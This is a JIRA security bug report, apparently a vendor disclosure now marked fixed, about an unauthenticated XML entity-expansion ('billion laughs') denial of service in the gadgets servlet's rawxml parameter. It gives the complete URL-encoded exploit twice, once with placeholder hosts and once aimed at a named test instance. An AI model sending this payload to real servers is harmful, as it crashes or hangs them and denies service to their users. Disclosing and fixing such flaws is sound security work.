Details
-
Bug
-
Resolution: Fixed
-
Highest
-
None
-
7.8
-
Description
An attacker is able to perform the billion laughs attack on a default JIRA installation (including OnDemand installations). This attack can be executed without authentication and leads to the complete use of resources on the victim machine (causing the server to crash or hang). It is possible due to the ability of being able to inject malicious XML entities through /plugins/servlet/gadgets/ifr?rawxml=.
Steps to recreate:
1. Replace the values in the following URL (host) and (host/jirapath):
https://host/plugins/servlet/gadgets/ifr?rawxml=%3C%3Fxml+version%3D% 221.0%22+encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE+lolz+%5B%0D%0A+%3C%21ENTITY+lol+%22lol%22%3E%0D%0A+%3C%21ELEMENT+lolz+%28%23PCDATA%29%3E%0D%0A+%3C%21ENTITY+lol1+%22%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%22%3E%0D%0A+%3C%21ENTITY+lol2+%22%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%22%3E%0D%0A+%3C%21ENTITY+lol3+%22%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%22%3E%0D%0A+%3C%21ENTITY+lol4+%22%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%22%3E%0D%0A+%3C%21ENTITY+lol5+%22%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%22%3E%0D%0A+%3C%21ENTITY+lol6+%22%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%22%3E%0D%0A+%3C%21ENTITY+lol7+%22%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%22%3E%0D%0A+%3C%21ENTITY+lol8+%22%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%22%3E%0D%0A+%3C%21ENTITY+lol9+%22%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%22%3E%0D%0A%5D%3E%0D%0A%3CModule%3E%0D%0A%3CModulePrefs+title%3D%22Example%22%3E%0D%0A%3C%2FModulePrefs%3E%0D%0A%3CContent%3E%0D%0Adfgd%26lol9%3B%0D%0A%3C%2FContent%3E%0D%0A%3C%2FModule%3E%0D%0A++++&url=https%3A%2F%2Fhost/jirapath%2Frest%2Fgadgets%2F1.0%2Fg%2Fcom.atlassian.jira.gadgets%3Aintroduction-gadget%2Fgadgets%2Fintroduction-gadget.xml
2. Make a request to the above URL, and the DoS exploit will be executed.
For example, on a test OnDemand instance, the URL to DoS the instance would be:
https://0daytest.jira-dev.com/plugins/servlet/gadgets/ifr?rawxml=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE+lolz+%5B%0D%0A+%3C%21ENTITY+lol+%22lol%22%3E%0D%0A+%3C%21ELEMENT+lolz+%28%23PCDATA%29%3E%0D%0A+%3C%21ENTITY+lol1+%22%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%22%3E%0D%0A+%3C%21ENTITY+lol2+%22%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%22%3E%0D%0A+%3C%21ENTITY+lol3+%22%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%22%3E%0D%0A+%3C%21ENTITY+lol4+%22%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%22%3E%0D%0A+%3C%21ENTITY+lol5+%22%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%22%3E%0D%0A+%3C%21ENTITY+lol6+%22%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%22%3E%0D%0A+%3C%21ENTITY+lol7+%22%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%22%3E%0D%0A+%3C%21ENTITY+lol8+%22%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%22%3E%0D%0A+%3C%21ENTITY+lol9+%22%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%22%3E%0D%0A%5D%3E%0D%0A%3CModule%3E%0D%0A%3CModulePrefs+title%3D%22Example%22%3E%0D%0A%3C%2FModulePrefs%3E%0D%0A%3CContent%3E%0D%0Adfgd%26lol9%3B%0D%0A%3C%2FContent%3E%0D%0A%3C%2FModule%3E%0D%0A++++&url=https%3A%2F%2F0daytest.jira-dev.com%2Frest%2Fgadgets%2F1.0%2Fg%2Fcom.atlassian.jira.gadgets%3Aintroduction-gadget%2Fgadgets%2Fintroduction-gadget.xml
Note the above URL is working, and the instance is currently up. You can see the exploit in action by visiting that link until the server hangs.
The original reporter of this security report was Nir Goldshlager ngoldshlager@salesforce.com.
Attachments
Issue Links
- was cloned as
-
-
- Closed
-
- mentioned in
-
Page Loading...
